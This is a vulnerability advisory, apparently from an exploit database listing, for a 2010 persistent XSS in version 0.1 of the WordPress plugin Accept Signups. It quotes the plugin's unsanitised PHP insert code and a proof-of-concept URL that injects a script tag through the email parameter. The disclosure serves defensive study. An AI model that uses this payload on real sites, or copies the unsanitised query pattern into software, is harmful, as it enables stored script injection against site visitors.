WORDPRESS Plugin Accept Signups PERSISTENT XSS

vendor:

Accept Signups

by:

clshack

8,8

CVSS

HIGH

Persistent XSS

CWE

Product Name: Accept Signups

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:wordpress:3.03

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WordPress 3.03

2010

WORDPRESS Plugin Accept Signups PERSISTENT XSS

A persistent XSS vulnerability exists in the WORDPRESS Plugin Accept Signups due to the lack of sanitization of user input. The vulnerable code is present in the accept-signups_submit.php file, which does not sanitize the user input before inserting it into the database. An attacker can exploit this vulnerability by sending a malicious payload in the email parameter of the accept-signups_submit.php file. This will result in the malicious payload being stored in the database and executed when the page is loaded.

Mitigation:

Sanitize user input before inserting it into the database.

Source

Exploit-DB raw data:

# Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS
# Date:21/12/2010
# Author: clshack
# Software Link:http://wordpress.org/extend/plugins/accept-signups/
# Version:0.1
# Tested on: wordpress 3.03
# CVE :
Vulnerable code accept-signups_submit.php:
require_once('../../../wp-config.php');//*addslashes* to GET and POST

$e=$_GET['email'];
function saveEmail($e) {
global $wpdb;
 $tbl = '`' . DB_NAME . '`.`' . $wpdb->prefix . 'accept-signups`';
$q = "insert into " .$tbl . " (email, ip, timestamp) value ('$e', '".
$_SERVER['REMOTE_ADDR'] . "', now());";
 return $wpdb->query($wpdb->prepare($q));
}

Poc:
http://localhost/wordpress/*wp-content/plugins/accept-signups/accept-signups_submit.php?email=clshack<script>alert(String.fromCharCode(72,
101, 108, 108, 111, 32, 58, 68, 32))</script>*